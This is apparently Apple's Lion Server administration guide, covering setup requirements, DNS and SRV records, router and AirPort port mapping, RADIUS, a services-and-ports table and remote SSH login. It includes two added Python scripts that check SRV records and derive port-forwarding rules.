
Lion Server: Advanced Administration

Lion Server fundamentals

Get started

Lion Server requirements


Mac OS X Lion Server has processor, memory, disk, and network requirements. To install Lion Server on a Mac, the Mac must have:

A 64-bit Intel processor
At least 2 gigabytes (GB) of random access memory (RAM)
At least 10 gigabytes (GB) of disk space available. Your server needs significantly more disk space (such as a high-capacity external hard drive) if you want to allow Lion, Snow Leopard, and Leopard users to back up their Macs on the server. A server needs even more disk space if you want to back up the server using Time Machine.
An Internet connection, if you're installing Lion Server from the Mac App Store. An Internet connection isn't required after installation.

Desktop or server hardware is recommended. An active connection to a secure network is recommended for server setup, but isn't required. After setup, your server must have a network connection for users to access its services. Some podcast encoding operations require a compatible graphics card. Some features have additional system requirements or require additional purchases. For details, see the Lion Server website at www.apple.com/macosx/server/.

A Mac server can be set up and used without a display and can be located where you don't have constant physical access to it. You can use another Mac to set up and administer a Mac server remotely. For information, see Prepare an administrator computer.


Lion Server tools


You can administer servers in a small to medium organization with the basic tools included in Lion Server. If you need to configure Lion Server in a large organization, or if you have special configuration requirements, you can use advanced administration tools that you may need to install separately. You can also use command-line tools to perform server administration tasks.

Basic tools

You can manage users and groups, start and stop services, change service settings, and perform other essential server administration tasks using the applications and utilities included with Lion Server and described below.

Screen Sharing

Observe and control your server from another computer on the network. You can open Screen Sharing from the Tools menu in the Server app.

Server

Manage users and groups. Monitor server status. Start, stop, and customize services. View and change system, network, and storage settings. Manage an AirPort device.

Server Status widget for Dashboard

Monitor server activity from any Mac with Mac OS X Lion.

System Preferences

Configure Time Machine backup of the server. Set up sharing for a directly connected USB or FireWire printer.

For more information about Screen Sharing, Server, and System Preferences, open the application and use the Help menu. For more information about the Server Status widget, see Use the Server Status widget.

Advanced administration tools

Besides the Server app and the other basic tools, you can use the applications described below. All except Directory Utility and Xsan Admin are located in the Server folder in Launchpad. If your server doesn't have that folder with the advanced tools in it, you can install them as described in Use advanced tools for more services.

Directory Utility

Configure advanced connections to directory servers. You can open Directory Utility from the Tools menu in the Server app.

Podcast Composer

Follow a structured, graphical process to create workflows that control how Podcast Producer generates and distributes podcasts.

Server Admin

Change advanced service settings and configure advanced services.

Server Monitor

Remotely monitor and manage one or more Xserve systems.

System Image Utility

Create NetBoot, NetInstall, and NetRestore images for Mac computers.

Workgroup Manager

Manage users, groups, computers, and computer groups in advanced server deployments. Manage preferences for Mac OS X Lion users.

Xgrid Admin

Remotely manage clusters, monitor controller and agent activity, and check job status on the grid.

Xsan Admin

Set up and manage a storage area network (SAN) to provide fast, shared storage among Macs connected to a Fibre Channel network. Located in the Utilities folder in Launchpad.

For more information about an advanced application, open it and use the Help menu.

Command-line tools

You can also use UNIX tools in the Terminal app to administer services, manage users, and perform most other server administration tasks. For more information, see About the command-line environment of Lion Server.
RELATED TOPICS

Command-line tools used in Lion Server administration


Services
Lion Server can provide services to Macintosh, Windows, and UNIX computers, and to iOS devices such as iPhone, iPod touch, and iPad. You use the Server app to turn on the services you want to provide, customize service settings, and turn off services you don't need. Services include:

Address Book service provides centralized contact information.

File sharing lets users store and share folders and files on the server.

iCal service provides shared calendars, so users can check each other's availability, book conference rooms, and schedule meetings and events.

iChat instant messaging service lets users collaborate by chatting and sharing information.

Mail service lets users send and receive email on your local network and the Internet using any email application or, optionally, a web browser.

Podcast service lets users publish audio and video podcasts they record and edit using the Podcast Publisher app on their Macs with Mac OS X Lion.

Profile Manager service lets you manage mobile devices and distribute configuration profiles that set up users' Macs and iOS devices to use your server.

A Time Machine destination lets users back up their Macs on your server's disk.

VPN service gives users secure remote access to your server and network via the Internet.

Web service lets you publish custom websites.

Wiki service lets users share information using wikis, blogs, and web calendars.


Server information
While Lion Server is providing accounts and services to users, you can check server system information and change server system settings.

Track server alerts
Monitor server stats
View server information
Allow remote login to your server via SSH
Allow screen sharing and remote management
Allow remote administration
Improve performance as a dedicated server
Use push notification
Manage the server's SSL identity certificates
Find the server's network address and host name
Manage server storage


Disk preparation
If you're going to install Lion Server on an existing computer and want a clean installation rather than an upgrade, use the Disk Utility app to erase the disk you'll install on. With Disk Utility, you can also partition the server's disk into multiple volumes or set up a RAID set. You can use Disk Utility when you begin installing Lion Server. For instructions, search Mac Help for Erase and reinstall Mac OS X. You can also use Disk Utility after installing Lion Server. Disk Utility is in the Utilities folder of Launchpad.

Formats for server disks

When you erase a disk before installing Lion Server on it, select one of these formats:

Mac OS Extended (Journaled): This format is recommended, and is the most common format for Mac and Mac server startup disks.

Mac OS Extended (Case-sensitive, Journaled): This format is worth considering if you're planning to have your server host a custom website with static web content instead of or in addition to wikis. A case-sensitive disk can host static web content with a more direct mapping between files and URLs.

You can erase other disks using one of the formats above, or a non-journaled variant: Mac OS Extended or Mac OS Extended (Case-sensitive). If the server has a disk formatted using the UNIX File System (UFS) format by an earlier version of Mac OS X or Mac OS X Server, do not use the UFS disk for a Lion Server startup disk.

Volumes on a partitioned disk

Partitioning a hard disk creates a volume for Lion Server and one or more volumes for service data and other software. The volume you install Lion Server on should be at least 10 GB. This volume should be larger if you plan to store shared folders, wikis, and other service data on it. The volumes on a partitioned disk are often simply called disks. Each volume appears as a disk in the Finder, and you use each volume as if it were a separate disk.

RAID sets

If you're installing Lion Server on a computer with multiple internal hard disk drives, you can create a RAID (Redundant Array of Independent Disks) set to optimize storage capacity, improve performance, and increase reliability in case of a disk failure. For example, a mirrored RAID set increases reliability by writing your data to two or more disks at once. If one disk fails, your server automatically continues using the other disks in the RAID set. Mirroring protects only against disk failure, not against accidental deletion or corruption, which is written to every mirror at once, so it does not replace a Time Machine backup of the server. You can set up RAID mirroring or another type of RAID set when you begin installing Lion Server. After installing, you can set up RAID mirroring on a disk that isn't partitioned. To prevent data loss, you should set up RAID mirroring as early as possible. For information about setting up a RAID set, search Disk Utility Help for Using RAID sets.

If you choose a RAID set, you won't get a recovery partition or FileVault full disk encryption. A recovery partition allows you to reinstall Mac OS X or recover your entire system from a Time Machine backup. Full disk encryption isn't recommended for a Lion Server startup disk or any disk that stores service data. If these disks are encrypted, the server can't restart until you go to the server and enter the password at the server's keyboard. If you use Lion Server to share an encrypted disk, the disk isn't available to users until you enter the password at the server's keyboard.


Network preparation

Register the servers Internet host name


To allow users to access the server by using its host name on the Internet, you must register the server's host name.

1. Obtain an Internet domain name like example.com. You can purchase one from a public domain name registrar. For information about domain name registrars, search the web.
2. Register a unique host name for this server, such as server.example.com, with your domain name registrar.
3. Have a DNS hosting service add records for this server to its DNS servers. Your DNS registrar might provide DNS hosting service, or you can search the web for a provider.

RELATED TOPIC

DNS records for your server


DHCP server configuration for your server


Before you set up your Mac server, configure your DHCP server to supply important network addresses to computers on your intranet. The DHCP server can provide each computer with its own IP address, the IP address of your network router, and the IP addresses of DNS servers for your network. When configuring your DHCP server, be sure to do the following:

Configure your network's DHCP server to assign a fixed (static) IP address to your server. This feature is called static mapping or DHCP reservations. With a fixed IP address, your server always has the same IP address, so other computer users can connect to it reliably.

Configure your DHCP server to provide your server's IP address as the DNS server address, unless your intranet has a DNS server. If your intranet doesn't have a DNS server, your server is configured as a DNS server during initial server setup.

If your intranet connects to the Internet through a router supplied by your Internet service provider or purchased from a computer retailer, the router is usually your DHCP server. For information about configuring your router, see its documentation. If your intranet and Internet connection are managed by your organization, ask the DHCP administrator to configure the DHCP servers for your Mac server. If you don't have a DHCP server, you can set up Lion Server's DHCP service. For information, see DHCP setup overview.


DNS records for your server


Before you set up your server, have your DNS server administrator add records for your server. After these records are added to a DNS server, users can access your server by using its host name, such as server.mycompany.com.

Users can use your server's host name on your intranet if the DNS server administrator for your intranet adds DNS records for your server. If your intranet doesn't have a DNS server, users can access your server by using its local hostname, such as server.local.

Users can use your server's host name on the Internet if a DNS hosting service adds the records described below to its DNS servers. These records must point your server's host name to the public IP address of your Internet router, if you have one. The DNS registrar you obtained a domain name from might provide DNS hosting service, or you can search the web for a provider.

A (address)

An A record is required. It maps your server's host name to its IP address. If you have an Internet router, your server has a unique, private IP address on your intranet, but on the Internet it uses the router's public IP address.

PTR (pointer)

A PTR record is required. It provides a reverse lookup by mapping the server's IP address to its host name. If you have an Internet router, your server has a unique private IP address on your intranet, but on the Internet it uses the router's public IP address. The reverse zone for a public IP address belongs to whoever owns that address block, usually your Internet service provider, so you normally have to ask them to add the PTR record rather than your DNS hosting service.

MX (mail exchange)

If your server provides mail service, the optional MX record specifies that your server is a mail server for your domain. An MX record lets users have an email address like mchen@example.com. Without an MX record, email addresses must include your server's full host name (for example, mchen@server.example.com).

CNAME (alias)

One or more optional CNAME records provide convenient access to services your server provides, such as mail.example.com and www.example.com.

SRV for Address Book service

If your server provides Address Book service, you can add an optional SRV record for Address Book Server's CardDAV protocol. In the examples below the owner name is relative to your domain, so _carddavs._tcp stands for _carddavs._tcp.example.com. The non-SSL variants carry traffic in the clear, so publish the SSL record whenever the server has a certificate for the service.

If you have an SSL certificate for Address Book service, add a record that maps _carddavs._tcp for port 8443 to your server's host name. For example:

_carddavs._tcp 86400 IN SRV 0 1 8443 server.example.com

If you don't have an SSL certificate for Address Book service, add a record that maps _carddav._tcp for port 8008 to your server's host name. For example:

_carddav._tcp 86400 IN SRV 0 1 8008 server.example.com

SRV for iCal service

If your server provides iCal calendar service, you can add an optional SRV record for iCal Server's CalDAV protocol. If you have an SSL certificate for iCal service, add a record that maps _caldavs._tcp for port 8443 to your server's host name. For example:

_caldavs._tcp 86400 IN SRV 0 1 8443 server.example.com

If you don't have an SSL certificate for iCal service, add a record that maps _caldav._tcp for port 8008 to your server's host name. For example:

_caldav._tcp 86400 IN SRV 0 1 8008 server.example.com

SRV (service locator) for iChat service

If your server provides iChat instant messaging service, you can add two optional SRV (service locator) records for iChat Server's XMPP (Jabber) protocol. One record controls connections between your server and other XMPP servers. It maps _xmpp-server._tcp for port 5269 to your server's host name. For example:

_xmpp-server._tcp 86400 IN SRV 0 1 5269 server.example.com

Another record controls iChat and other XMPP client connections to your server. It maps _xmpp-client._tcp for port 5222 to your server's host name. For example:

_xmpp-client._tcp 86400 IN SRV 0 1 5222 server.example.com

These SRV records let users have an iChat address like mchen@example.com. Without these SRV records, iChat addresses must include your server's full host name (for example, mchen@server.example.com).
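The SRV records above are easy to get wrong by hand (a mistyped port, or a service label that does not match the port it points at). The following checker is an added example, not part of Apple's documentation: it parses record lines in the form shown in this section and reports ports that do not match the service label, ports outside the valid range, and targets that are IP addresses rather than host names. The EXPECTED table is taken from the pairings given above; the sample zone text, the function names and the 192.0.2.10 address are constructed for the example.

```python
"""Validate SRV records for Lion Server's Address Book, iCal and iChat services.

Added example, not from Apple's documentation. Input lines use the zone-file
form shown in the text (owner TTL class type priority weight port target);
owner names are relative to the zone, so "_caldavs._tcp" means
_caldavs._tcp.example.com. EXPECTED holds the service/port pairings from
the text."""
import ipaddress

# service label -> port Lion Server listens on for that protocol variant
EXPECTED = {
    "_carddav._tcp": 8008,      # Address Book, no SSL
    "_carddavs._tcp": 8443,     # Address Book over SSL
    "_caldav._tcp": 8008,       # iCal, no SSL
    "_caldavs._tcp": 8443,      # iCal over SSL
    "_xmpp-client._tcp": 5222,  # iChat client connections
    "_xmpp-server._tcp": 5269,  # iChat server-to-server
}


def parse_srv(line):
    """Return a dict for one SRV record line, or raise ValueError."""
    fields = line.split()
    if len(fields) != 8:
        raise ValueError(f"expected 8 fields, got {len(fields)}: {line!r}")
    owner, ttl, rclass, rtype, prio, weight, port, target = fields
    if rclass.upper() != "IN" or rtype.upper() != "SRV":
        raise ValueError(f"not an IN SRV record: {line!r}")
    return {"owner": owner, "ttl": int(ttl), "priority": int(prio),
            "weight": int(weight), "port": int(port), "target": target}


def check_record(rec):
    """Return a list of problems found in one parsed record (empty if clean)."""
    problems = []
    if not 0 < rec["port"] < 65536:
        problems.append(f"{rec['owner']}: port {rec['port']} is not a valid TCP port")
    expected = EXPECTED.get(rec["owner"])
    if expected is None:
        problems.append(f"{rec['owner']}: not a service label Lion Server publishes")
    elif rec["port"] != expected:
        problems.append(f"{rec['owner']}: port {rec['port']} but Lion Server uses {expected}")
    # An SRV target must be a host name that has its own A record, never an IP address.
    try:
        ipaddress.ip_address(rec["target"].rstrip("."))
        problems.append(f"{rec['owner']}: target {rec['target']} is an IP address, not a host name")
    except ValueError:
        pass  # not an address literal, which is what we want
    return problems


def check_zone(text):
    """Check every non-empty, non-comment line; return {owner: [problems]} for bad records."""
    findings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        try:
            rec = parse_srv(line)
        except ValueError as exc:
            findings.setdefault("<unparsed>", []).append(str(exc))
            continue
        problems = check_record(rec)
        if problems:
            findings.setdefault(rec["owner"], []).extend(problems)
    return findings


# Constructed sample: the records the text recommends, plus two mistaken
# lines of the kind that are easy to make by hand (a port typo and an IP target).
SAMPLE_ZONE = """
; SSL variants, when the server has certificates for Address Book and iCal
_carddavs._tcp 86400 IN SRV 0 1 8443 server.example.com
_caldavs._tcp 86400 IN SRV 0 1 8443 server.example.com
; iChat
_xmpp-server._tcp 86400 IN SRV 0 1 5269 server.example.com
_xmpp-client._tcp 86400 IN SRV 0 1 5222 server.example.com
; mistakes
_caldav._tcp 86400 IN SRV 0 1 80008 server.example.com
_carddav._tcp 86400 IN SRV 0 1 8008 192.0.2.10
"""

if __name__ == "__main__":
    for owner, problems in check_zone(SAMPLE_ZONE).items():
        for problem in problems:
            print(problem)
```

Run it against the records you intend to hand to your DNS hosting service before they go live; the four recommended records pass, and only the two deliberately broken lines are reported.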


Port mapping for network and server protection


If you have a network router that shares its Internet connection with computers on your intranet, such as an AirPort Extreme Base Station (802.11n) or a Time Capsule, the router isolates your intranet from the Internet. These Internet-sharing routers protect your intranet against attacks from the Internet by blocking communications that originate outside the intranet. Computers on the Internet can't access your server unless you configure your router to expose specific services on the Internet. For example, you might expose your wiki and web services on the Internet, but not file sharing. You can still control access to wikis by requiring users to log in to view them.

The process of exposing individual services to the Internet is called port mapping or port forwarding. Internet users can access your exposed services by using an Internet host name, such as server.mycompany.com, that you register with a public DNS registrar or a DNS hosting service. Your registered host name points to the public IP address you got from your Internet service provider and configured your router to use. Internet users can also access your exposed services by using your public IP address directly instead of by using an Internet host name.

When using your Internet host name or public IP address to access a specific service, such as your wiki service, users actually reach your router. If you exposed the service, your router forwards the request to your server. If you didn't expose the service, the router doesn't forward the request, and the user can't get that service from your server. Port mapping only decides which services the router forwards; an exposed service is reachable by anyone on the Internet, so it must still require users to log in and, where the service offers it, use SSL.

If you want to let Internet users with accounts on your server access services that aren't exposed to the Internet, you can turn on VPN service. It provides a secure remote connection to all services on your intranet.
RELATED TOPICS

Router port mapping
Manage AirPort port mapping and Wi-Fi login
Register the server's Internet host name
About VPN


Router port mapping


If you have a cable router, DSL router, or other network router that shares its Internet connection with computers on your intranet, you can manually configure the router to protect your intranet while allowing access to selected services from the Internet. You configure your router to forward requests for individual services to your server. This process is called port mapping or port forwarding, because each service communicates through an abstract, numbered communication port. Unlike the Ethernet port on your computer, these ports aren't physical.

You can configure port mapping on an AirPort device by using the Server app. For information, see Manage AirPort port mapping and Wi-Fi login.

You can manually configure port mapping on most Internet routers by using their configuration software. Usually, the configuration software consists of several webpages. Using a web browser on any computer connected to your intranet, you go to the webpage with settings for port mapping or port forwarding. In some cases, you can select standard services such as web or VPN and specify that each be mapped to your server's IP address. In other cases, you must enter port numbers for services and enter your server's IP address for each one. For a list of services and the corresponding ports for which you might want to set up port mapping or forwarding, see Services and ports.


AirPort port mapping


If you have an AirPort Extreme Base Station (802.11n) or a Time Capsule, Lion Server can automatically manage it to protect your intranet, while allowing access to selected services from the Internet. You can use the Server app to designate public services that can be accessed by computers on the Internet. Lion Server configures your AirPort device to expose those public services on the Internet. The process of exposing individual services to the Internet is called port mapping or port forwarding. For more information, see Port mapping for network and server protection.

You can also let users log in to your wireless network with their user name and password instead of the Wi-Fi network password. In this case, your server provides Remote Authentication Dial In User Service (RADIUS) for your AirPort device and authorizes all user accounts on the server to access your wireless network. For more information, see About RADIUS for AirPort.

Your AirPort device must have its Connection Sharing option set to Share a public IP address (that is, an Internet connection) in order for Lion Server to manage it. The advanced option IPv6 Mode must be set to Tunnel. The default host option should also be turned off, which is the default setting.

You should make sure the AirPort device has a secure password instead of the default password, which is "public". This password controls the device's configuration, including which services are exposed to the Internet, so anyone on the intranet who knows it can change the port mapping. You need to know the AirPort device password (not the Wi-Fi network password) to turn on AirPort management.
RELATED TOPIC

Manage AirPort port mapping and Wi-Fi login


Manage AirPort port mapping and Wi-Fi login


The Server app can manage an AirPort device to give Internet computers access to selected services, and to let users log in to your wireless network with their name and password. The Server app can manage an AirPort Extreme Base Station (802.11n) or a Time Capsule. To be managed, your AirPort device must have its Connection Sharing option set to Share a public IP address (that is, an Internet connection). The advanced option IPv6 Mode must be set to Tunnel. The default host option should also be turned off, which is the default setting. If you don't use the Server app to manage your router, you can use the router's configuration software to protect your server and your intranet. For information, see Router port mapping.

Add or remove public services

You can use the Server app to designate public services that can be accessed by computers on the Internet. Lion Server configures your AirPort device to expose those public services on the Internet. The process of exposing individual services to the Internet is called port mapping or port forwarding. For more information, see Port mapping for network and server protection.

1. In the Server app sidebar, select your AirPort device. The AirPort device is listed in the Hardware section of the sidebar.
2. To expose a service to computers on the Internet, click the Add button (+) and choose the service from the pop-up menu. If the service you want to add isn't listed in the pop-up menu, choose Other, and then enter the service name and port. For a list of services, see Services and ports. Note: Exposing web service also exposes wiki, web calendar, webmail, and Profile Manager services.
3. To stop a listed service from accepting connections initiated by computers on the Internet, select the service and click the Delete button (-).
4. To apply your changes, click Restart AirPort. If asked, enter the password for your AirPort device.

Important: Restarting your AirPort device interrupts its services for all computers on your intranet for up to a minute. AirPort device services may include Internet access, DHCP service, and a shared disk for Time Machine backup or other uses. When entering the password to authorize restarting the wireless device, use the password for your AirPort device, not the password for your Wi-Fi network. Lion Server remembers this password, so you don't have to enter it again unless you change it on your AirPort device.

Services that aren't in the Public Services list can get incoming connections only from the server's intranet.

Allow user name and password login over Wi-Fi

You can let users log in to your wireless network with their user name and password instead of the Wi-Fi network password. In this case, your server provides Remote Authentication Dial In User Service (RADIUS) for your AirPort device and authorizes all user accounts on the server to access your wireless network. For more information, see About RADIUS for AirPort.

1. In the Server app sidebar, select your AirPort device. The AirPort device is listed in the Hardware section of the sidebar.
2. If you want users to log in to your wireless network with their user account credentials, select Allow user name and password login over Wi-Fi. Important: Your server will lose its connection to the AirPort device unless the two are connected via a wired Ethernet network. Don't select this option if you want to let users log in to your wireless network with the Wi-Fi network password. You can turn off RADIUS using the AirPort Utility app (in the Utilities folder in Launchpad).
3. To apply your changes, restart your AirPort device by entering its password and clicking Set. Important: Restarting your AirPort device interrupts its services for all computers on your intranet for up to a minute. AirPort device services may include Internet access, DHCP service, and a shared disk for Time Machine backup or other uses. When entering the password to authorize restarting the AirPort device, use the password for the device, not the password for your Wi-Fi network. Lion Server remembers this password, so you don't have to enter it again unless you change it on your AirPort device.

Selecting this option starts RADIUS on your server, registers the selected AirPort device with RADIUS, and authorizes all user accounts on the server to access your wireless network.


About RADIUS for AirPort


Lion Server can provide Remote Authentication Dial In User Service (RADIUS) for your AirPort Extreme Base Station (802.11n) or Time Capsule. RADIUS keeps your wireless network secure by making sure it's used only by authorized users. With RADIUS, users log in to your wireless network by entering the name and password of a user account on your server. They can't log in to your wireless network with the Wi-Fi network password, which is configured on the AirPort Extreme Base Station or Time Capsule. Without RADIUS, anyone who learns your Wi-Fi network password can log in to your wireless network, and the only way to revoke their access is to change the shared password on every device.

When a user tries to access the wireless network of an AirPort Extreme Base Station or a Time Capsule, the device communicates with RADIUS on your server using Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their user credentials are valid and they are authorized to use the AirPort Extreme Base Station or Time Capsule. A user who isn't authorized can't access the network through the AirPort Extreme Base Station or Time Capsule.

You turn on RADIUS for Lion Server by selecting your Apple wireless device in the Server app sidebar and selecting Allow user name and password login over Wi-Fi. The Server app starts RADIUS on your server, registers the selected Apple wireless device with RADIUS, and authorizes all user accounts on the server to access your wireless network. Because every account on the server is authorized, an account created only for a service or a shared mailbox also grants wireless access, and disabling a user's account is what removes it.


Services and ports


If your server connects to the Internet through a cable router, DSL router, or other network router, you can configure port forwarding (or port mapping) to allow access to some services from the Internet while protecting other services and other computers on your network. Use the following table to determine the port numbers for the services you want to expose on the Internet. Configure your router to forward only those ports to your server's IP address. Some Internet routers require you to specify TCP or UDP for each port, while other routers don't. For specific information about how to configure port forwarding on your router, see its documentation.

Forward only what Internet users actually need. Where a service has an SSL variant, expose that one rather than the plain one, and keep file sharing, screen sharing, and SSH off the Internet, reaching them over VPN service instead.

If your router is an AirPort Extreme Base Station (802.11n) or a Time Capsule, you can use the Server app to configure port forwarding. For information, see Manage AirPort port mapping and Wi-Fi login.

If your intranet has a separate firewall device, and you want to allow access to some services outside your intranet, ask the firewall administrator to open the firewall for the communications ports and protocols that your services use. Use the following table to determine the port numbers you need to have open on the firewall.
Service                              Port            TCP or UDP
Address Book Server                  8008            TCP
Address Book Server SSL              8443            TCP
iCal Server                          8008            TCP
iCal Server SSL                      8443            TCP
iChat Server                         5222            TCP
iChat Server SSL                     5223            TCP
iChat server-to-server               5269            TCP
iChat Server file transfer           7777            TCP
iChat local                          5678            UDP
iChat audio/video RTP and RTCP       16384-16403     UDP
File sharing SMB                     139             TCP
File sharing AFP                     548             TCP
Mail service SMTP standard           25              TCP
Mail service POP3                    110             TCP
Mail service IMAP                    143             TCP
Mail service SMTP submission         587             TCP
Mail clients IMAP SSL                993             TCP
Mail clients POP3 SSL                995             TCP
Remote login SSH (Secure Shell)      22              TCP
Screen sharing VNC                   5900            TCP
Web service HTTP                     80              TCP
Web service HTTPS                    443             TCP
Web service custom website           YourPortNumber  TCP
VPN L2TP ISAKMP/IKE                  500             UDP
VPN L2TP                             1701            UDP
VPN L2TP IKE NAT Traversal           4500            UDP
VPN L2TP ESP (firewall only)         IP protocol 50  n/a
VPN PPTP                             1723            TCP

Note: Exposing web service also exposes wiki, web calendar, webmail, and Profile Manager services.
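To turn a chosen set of services into the shortest possible forwarding list, and to catch the exposures the text warns against, the following script is an added example, not part of Apple's documentation. It encodes the table above, merges ports that several services share (Address Book and iCal both use 8008 and 8443), and warns when a service the text recommends keeping on the intranet (file sharing, screen sharing, SSH) is selected, when a plain service is exposed without its SSL counterpart, and that exposing web service also exposes the wiki, webmail and Profile Manager. The server address 192.168.1.10, the SAMPLE_SERVICES selection and the function names are assumptions made for the example.

```python
"""Derive router port-forwarding rules for a set of Lion Server services and
flag exposures this section advises against.

Added example, not part of Apple's documentation. PORTS is the Services and
ports table; the service names are its row labels. The server address, the
sample selection and the function names are assumptions."""

# Per service: list of (port or (low, high) range, transport). Transport is
# "tcp", "udp", or "ip" for a raw IP protocol number (ESP), which a router
# cannot forward by port number; only a firewall can permit it.
PORTS = {
    "Address Book Server": [(8008, "tcp")],
    "Address Book Server SSL": [(8443, "tcp")],
    "iCal Server": [(8008, "tcp")],
    "iCal Server SSL": [(8443, "tcp")],
    "iChat Server": [(5222, "tcp")],
    "iChat Server SSL": [(5223, "tcp")],
    "iChat server-to-server": [(5269, "tcp")],
    "iChat Server file transfer": [(7777, "tcp")],
    "iChat local": [(5678, "udp")],
    "iChat audio/video RTP and RTCP": [((16384, 16403), "udp")],
    "File sharing SMB": [(139, "tcp")],
    "File sharing AFP": [(548, "tcp")],
    "Mail service SMTP standard": [(25, "tcp")],
    "Mail service POP3": [(110, "tcp")],
    "Mail service IMAP": [(143, "tcp")],
    "Mail service SMTP submission": [(587, "tcp")],
    "Mail clients IMAP SSL": [(993, "tcp")],
    "Mail clients POP3 SSL": [(995, "tcp")],
    "Remote login SSH": [(22, "tcp")],
    "Screen sharing VNC": [(5900, "tcp")],
    "Web service HTTP": [(80, "tcp")],
    "Web service HTTPS": [(443, "tcp")],
    "VPN L2TP": [(500, "udp"), (1701, "udp"), (4500, "udp"), (50, "ip")],
    "VPN PPTP": [(1723, "tcp")],
}

# Services the text suggests keeping off the Internet (reach them over VPN instead).
INTRANET_ONLY = {"File sharing SMB", "File sharing AFP", "Screen sharing VNC", "Remote login SSH"}

# Plain service -> its SSL counterpart, so exposing the plain one can be flagged.
SSL_VARIANT = {
    "Address Book Server": "Address Book Server SSL",
    "iCal Server": "iCal Server SSL",
    "iChat Server": "iChat Server SSL",
    "Mail service POP3": "Mail clients POP3 SSL",
    "Mail service IMAP": "Mail clients IMAP SSL",
    "Web service HTTP": "Web service HTTPS",
}


def forwarding_rules(services, server_ip):
    """Return (rules, warnings).

    rules: sorted, de-duplicated list of (transport, port_or_range, server_ip).
    warnings: human-readable cautions, each reported once."""
    rules, warnings = set(), {}  # dict keeps warning order and drops repeats
    for name in services:
        if name not in PORTS:
            raise KeyError(f"unknown service {name!r}; choose Other and enter the port by hand")
        if name in INTRANET_ONLY:
            warnings[f"{name}: not recommended on the Internet; reach it over VPN service instead"] = None
        if name in SSL_VARIANT and SSL_VARIANT[name] not in services:
            warnings[f"{name}: unencrypted; expose {SSL_VARIANT[name]} instead"] = None
        if name.startswith("Web service"):
            warnings["Web service: exposing it also exposes wiki, web calendar, webmail and Profile Manager"] = None
        for port, transport in PORTS[name]:
            rules.add((transport, port, server_ip))
    ordered = sorted(rules, key=lambda r: (r[0], r[1] if isinstance(r[1], int) else r[1][0]))
    return ordered, list(warnings)


# Constructed selection: a typical Internet-facing set, plus AFP by mistake.
SAMPLE_SERVICES = ["Web service HTTP", "Web service HTTPS", "Address Book Server SSL",
                   "iCal Server SSL", "VPN L2TP", "File sharing AFP"]
SERVER_IP = "192.168.1.10"  # assumed intranet address of the server

if __name__ == "__main__":
    rules, warnings = forwarding_rules(SAMPLE_SERVICES, SERVER_IP)
    for transport, port, ip in rules:
        print(f"forward {transport} {port} -> {ip}")
    for warning in warnings:
        print("warning:", warning)
```

The sample selection yields eight rules (8443 appears once although two services use it, and the ESP entry is marked "ip" so you know to hand it to the firewall rather than the router) and two warnings, one for the web exposure and one for AFP.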


Prepare an administrator computer


You can use the Server app on an administrator computer to set up and manage your server over the network. You can install the Server app on a Mac that isn't a server, making it an administrator computer. If you have more than one server, they already have the Server app installed, and you can use them as administrator computers. As illustrated below, you use the Server app on the administrator computer to check server status, manage accounts and services, and view or change server system settings. The remote server doesn't need a display.

1. Install the Server app on a Mac you want to be an administrator computer by doing either of the following:
Copy from your server. You can copy the Server app from your server to a Mac that you want to be an administrator computer.
Install from the Mac App Store. After purchasing Lion Server from the App Store on your server, you can install it free of charge on a Mac you want to be an administrator computer. You open the App Store on the prospective administrator computer, find Lion Server in the App Store, click Buy, and provide the Apple ID you used to purchase Lion Server. The Server app is downloaded to the administrator computer.
2. Open the Server app you installed in step 1, and then choose Manage > Connect to Server. The Choose a Mac dialog appears. If the Welcome to Server dialog appears instead, choose Manage > Connect to Server again.
3. You can now select another Mac to manage, or select a Mac that's ready for server setup, and then click Continue. For additional instructions, see Manage Lion Server remotely or Set up a server remotely.

Note: If you select This Mac (that is, the Mac you're working on) and click Continue, the Server app makes the Mac a server.


Use advanced tools for more services


Managing users, groups, and services is easy with the Server app. You can change advanced settings and configure advanced accounts and services not available in the Server app by using advanced administration tools. If your server doesn't have the advanced tools (in the Server folder in Launchpad), you can install them. For information about advanced tools, accounts, services, and settings, see Lion Server tools.

To add the administration tools to your server, download the Server Admin Tools for Mac OS X Lion Server from the AppleCare Support Downloads website at www.apple.com/support/downloads/, and then install the downloaded software.


More information
For more information, see these resources.

Lion Server website (www.apple.com/macosx/server/): Enter the gateway to extensive product and technology information.
Lion Server Support website (www.apple.com/support/lionserver/): Access hundreds of articles from Apple's support organization.
Apple Training and Certification website (www.apple.com/training/): Hone your server administration skills with instructor-led or self-paced training, and differentiate yourself with certification.
Apple Discussions website (discussions.apple.com): Share questions, knowledge, and advice with other administrators.
Apple Mailing Lists website (www.lists.apple.com): Subscribe to mailing lists so you can communicate with other administrators using email.

The Server app

Start or stop a service


Starting a service makes it available to users on your network, and stopping a service makes it unavailable.

Start a service
Starting a service makes it available for users on your network.
1. In the Server app sidebar, select the service you want to start.
2. Click the On/Off switch to turn on the service.
3. If a dialog asks whether you want to allow Internet access to the service you turned on, click Allow to configure your AirPort device and make the service accessible to Internet users. Click Don't Allow if you don't want the service to be accessible to computers on the Internet, or if you're not sure. You can change Internet access to services later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login.
The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device. These services include Address Book, iCal, iChat, Mail, and Web.
If you have an Internet router that isn't listed in the Server sidebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For information, see Router port mapping.

Stop a service
Stopping a service makes it unavailable to users on your network.
1. In the Server app sidebar, select the service you want to stop.
2. Click the On/Off switch to turn off the service.


Manage Lion Server remotely


You can connect the Server app to a Mac server over the network and manage users, groups, services, and system information on the remote server. The remote server must have Mac OS X Lion Server.

1. If necessary, install the Server app on the Mac you want to use for administering your server. For instructions, see Prepare an administrator computer.
2. In the Server app, choose Manage > Connect to Server.
3. Select the server you want to manage, and then click Continue. If you want to manage a server that isn't listed, such as a server outside your intranet, select Other Mac, click Continue, and then enter its host name or IP address.
4. Enter an administrator name and password for the server you selected, and then click Connect.


Manage general settings

Allow remote login to your server


If you use the Server app to allow remote login, you can use SSH (Secure Shell) to log in to your server from another computer.

Allow remote login using SSH
1. Select the server in the Server app sidebar, and click Settings.
2. Select Allow remote login using SSH. Selecting this option also enables the secure FTP (sftp) service.
Allowing remote login to your server can make your server less secure. For information about keeping your server secure, search Mac Help for Protect the information on your Mac.

Log in from another computer
